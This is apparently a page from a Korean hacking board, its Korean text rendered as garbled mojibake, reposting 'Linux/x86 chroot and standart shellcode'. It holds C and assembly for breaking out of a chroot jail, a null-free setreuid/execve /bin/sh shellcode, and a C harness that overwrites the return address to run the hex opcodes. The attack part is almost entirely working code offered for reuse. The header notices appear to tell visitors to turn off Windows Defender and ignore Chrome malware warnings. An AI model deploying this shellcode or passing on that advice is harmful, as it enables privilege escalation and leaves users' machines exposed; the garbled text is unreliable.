ÇØÄ¿Áî´º½º / ÇØÄ¿´ëÇÐ

Donation bitcoin(±âºÎ¿ë ºñÆ®ÄÚÀÎ ÁÖ¼Ò)
¡¡
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
¡¡
±âºÎÇϽŠºñÆ®ÄÚÀÎÀº "º¸¾È Ãë¾à °èÃþ"À» À§ÇØ »ç¿ëµÇ°í ÀÖ½À´Ï´Ù.
¡¡
¡¡

Donation bitcoin(±âºÎ¿ë ºñÆ®ÄÚÀÎ ÁÖ¼Ò)
¡¡
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
¡¡
±âºÎÇϽŠºñÆ®ÄÚÀÎÀº "º¸¾È Ãë¾à °èÃþ"À» À§ÇØ »ç¿ëµÇ°í ÀÖ½À´Ï´Ù.
¡¡

°øÁö
¡¡

1. MS ¿§Áö ºê¶ó¿ìÀú¿¡¼­ÀÇ °æ°íâÀº 'À©µµ¿ì µðÆæ´õ'¸¦ ²ô½Ã¸é µË´Ï´Ù.

             'À©µµ¿ì µðÆæ´õ ²ô±â'

2. Å©·Ò ºê¶ó¿ìÀú·Î Á¢¼Ó½Ã ³ª¿À´Â ¾Ç¼ºÄÚµå °æ°íâÀº ±¸±Û Å©·ÒÀÇ ¿¡·¯, Áï ¿ÀŽ(ŽÁö ¿À·ù)À̹ǷΠ¹«½ÃÇÏ½Ã¸é µË´Ï´Ù.

3. ÀÌ »çÀÌÆ®´Â ¾ÈÀüÇÏ¸ç ±ú²ýÇÏ´Ù´Â °ÍÀ» ¾Ë·Á µå¸³´Ï´Ù.

4. ¹«°íÇÑ »çÀÌÆ®µé¿¡ ´ëÇÑ °ø·æ ±â¾÷ ºê¶ó¿ìÀúµéÀÇ ¹«Â÷º°ÀûÀÎ 'ŽÁö ¿À·ù ȾÆ÷'°¡ »ç¿ëÀÚµéÀÇ Á¤º¸ °øÀ¯ÀÇ ÀÚÀ¯¸¦ ħÇØÇÏ°í ÀÖ½À´Ï´Ù. ÀÌ¿¡ ´ëÀÀÇÏ¿© ÀÌ ±â¾÷µéÀ» »ó´ë·Î ¼Ò¼ÛÀ» ÁغñÇÏ°í ÀÖ½À´Ï´Ù.

¡¡
Ãâó: Okti
À帣: ½©ÄÚµå
Linux/x86 chroot and standart shellcode  
Linux/x86 chroot and standart shellcode.


----------------------------------------------------------------------------------------------

/* Mkdir and Chroot are written in C: */

#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
#include<sys/stat.h>
int main(void) {

      mkdir("sh", 0);
      chown("sh", 0, 0);
      chmod("sh", S_IRUSR | S_IWUSR);
      chroot("sh");
/* But many '../' as possible, i'm to lazy to add comments;) */
      chroot("../../../../../../../../../../../../../../../../../../../../../../../../");
}

----------------------------------------------------------------------------------------------

Asm version of the above C code:

----------------------------------------------------------------------------------------------

.file "y.c"
.section .rodata
.LC0:
.string "sh"
.align 4
.LC1:
.string "../../../../../../../../../../../../../../../../../../../../"
.text
.globl main
.type main, @function
main:
pushl %ebp
movl %esp, %ebp
subl $8, %esp
andl $-16, %esp
movl $0, %eax
addl $15, %eax
addl $15, %eax
shrl $4, %eax
sall $4, %eax
subl %eax, %esp
subl $8, %esp
pushl $0
pushl $.LC0
call mkdir
addl $16, %esp
subl $4, %esp
pushl $0
pushl $0
pushl $.LC0
call chown
addl $16, %esp
subl $8, %esp
pushl $384
pushl $.LC0
call chmod
addl $16, %esp
subl $12, %esp
pushl $.LC0
call chroot
addl $16, %esp
subl $12, %esp
pushl $.LC1
call chroot
addl $16, %esp
leave
ret
.size main, .-main
.section .note.GNU-stack,"",@progbits
.ident "GCC: (GNU) 3.4.1 (Mandrakelinux 10.1 3.4.1-4mdk)"

------------------------------------------------------------------------------------------------

Standart setreuid and execve shellcode (66 bytes).
It is all clean and tidy, uses 'pop' and 'push', to get string '/bin/sh' from data segment,
no null bytes.
For details, compile this asm code with: nasm -f elf shell.asm then ld shell.o and ./a.out

------------------------------------------------------------------------------------------------

section .data

db '/bin/sh'
global _start

_start:

; setruid(uid_t ruid, uid_t euid)

xor eax, eax
mov al, 70
xor ebx, ebx
xor ecx, ecx
int 0x80

jmp two
one:
pop ebx

; execve(const char *filename, char *const argv[], char *const envp[])

xor eax, eax
mov [ebx+7], al
mov [ebx+8], ebx
mov [ebx+12], eax
mov al, 11
lea ecx, [ebx+8]
lea edx, [ebx+12]
int 0x80

two:
call one
db '/bin/sh'

---------------------------------------------------------------------------------------------------

Hex opcodes of the mkdir chroot and above shellcode asm instructions (in C).

---------------------------------------------------------------------------------------------------

#include<stdio.h>
#include<stdlib.h>
int main() {

      int *ret;
      long offset = 4;
      char star[] =
      "\x89\xda\x8b\x4c\x24\x08\x8b\x5c\x24\x04\xb8\x27\x00\x00\x00\xcd\x80"
      "\x89\xda\x8b\x5c\x24\x04\xb8\x3d\x00\x00\x00\xcd\x80"
      "\x2f\x62\x69\x6e\x2f\x73\x68\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd"
      "\x80\xe9\x16\x00\x00\x00\x5b\x31\xc0\x88\x43\x07\x89\x58\x08\x89"
      "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff"
      "\xff\x2f\x62\x69\x6e\x2f\x73\x68";

      *((int * ) &ret + offset) = (int) star;
}


                    ´äº¯/°ü·Ã ¾²±â ¼öÁ¤/»èÁ¦     ÀÌÀü±Û ´ÙÀ½±Û    
¹®¼­¹øÈ£À帣¹®¼­¸íÃâó÷ºÎ
     ÀÌ°÷¿¡¼­´Â ¹öÆÛ¿À¹öÇ÷οì¿Í Æ÷¸Ë½ºÆ®¸µ ¹ö±×¿¡ ´ëÇÑ ¹®¼­µéÀ» Á¦°øÇÕ´Ï´Ù.
93 ½©ÄÚµå    À¯¿ëÇÑ ½©ÄÚµå ¸ðÀ½ ±èÁøÅà  
92 XSS    XSS È¿À²ÀûÀÎ ¹æ¾î¹ý 3°¡Áö Á¶ÅÂÇü  
91 ¹öÆÛ¿À¹öÇÃ·Î¿ì    ¿À¹öÇÃ·Î¿ì °ø°Ý°ú ¹æ¾î ±èÁøÅà   
90 ½©ÄÚµå    Linux/x86 chroot and standart shellcode Okti  
89 ¹öÆÛ¿À¹öÇÃ·Î¿ì    Àß ¸¸µé¾îÁø ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹®¼­ ¹Ì»ó  
88 ½©ÄÚµå    ³×Æ®¿öÅ© ½©ÄÚµå ¸¸µé±â À̵¿¿ì  
87 ½©ÄÚµå    ¼Ö¶ó¸®½º ¹ÙÀεù ½©ÄÚµå truefinder,  
86 ½©ÄÚµå    bin À» 16Áø¼ö·Î º¯È¯ÇÏ´Â Åø ÇØÄ¿Áî´º½º   
85 ½©ÄÚµå    ½©ÄÚµå »ý¼º±â ÇØÄ¿Áî´º½º   
84 ½©ÄÚµå    FTP ¿ø°Ý ´Ù¿î·Îµå/½ÇÇà ¹ÙÀεù Matt Conover  
83 ½©ÄÚµå    TCP ¹ÙÀεù ½©ÄÚµå Matt Conover   
82 ½©ÄÚµå    Cygnus Win32 À©µµ½© Matt Conover   

 
óÀ½ ÀÌÀü ´ÙÀ½       ¸ñ·Ï ¾²±â